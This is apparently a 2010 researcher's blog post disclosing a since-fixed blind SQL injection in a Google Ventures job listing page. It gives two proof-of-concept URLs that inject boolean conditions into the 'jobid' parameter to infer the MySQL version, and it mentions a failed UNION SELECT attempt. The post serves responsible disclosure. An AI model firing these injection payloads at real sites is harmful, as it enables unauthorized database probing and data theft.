miércoles, 9 de junio de 2010

:::SPAS3C-WV-002:::Google App (Ventures) BSQLi Vulnerability

One month ago, I found serveral vulnerabilities in Google's sites.

These issues got fixed all and I want to say that Google Security Team did a good job and they fixed it soon.

All issues was discovered between 4 May and 9 May (year 2010, of course).

This issue is the most important in my opinion: Blind SQL Injection in googleventures.com

Risk: High

Google Ventures is Google’s venture capital arm.

We do primarily three things:
  1. Seek out the most innovative and interesting entrepreneurs and companies we can find
  2. Perform in-depth due diligence and invest in those we are most excited about
  3. Do everything we can to help those companies succeed
We invest for financial return, across all sectors and in all stages of a company’s growth. We are particularly interested in areas where access to our team, facilities, technology or other resources can help a company become more successful, but we do not limit our investments to those of strategic interest to Google – we look for companies and people that have the best opportunity to create significant, disruptive and innovative ventures.

Source: here

Site was made using PHP+MySQL (some parts) and GET var "jobid" vulnerable to injection of SQL code.

Proofs Of Concept (Searching MySQL version)

Return: 1=1 (True), so MySQL version is 5

Link PoC -> http://jobs.googleventures.com/jobdetail.php?jobid=39109+AND+IF(substring(@@version,1,1)=5,1,0)=1--

Fig. 1: BSQLi. True result.

Return 1=0 (False), so MySQL version isn't 4.

Link PoC -> http://jobs.googleventures.com/jobdetail.php?jobid=39109+AND+IF(substring(@@version,1,1)=4,1,0)=1--

Fig. 2: BSQLi. False result.

Also I tried to get a SQL Injection, with "Union Select" Statement but It didn't work.

Fig. 3: Trying SQL Injection "Union Select". MySQL error.

I didn't want to do a further research because I considered that it was enough.

Be safe ;)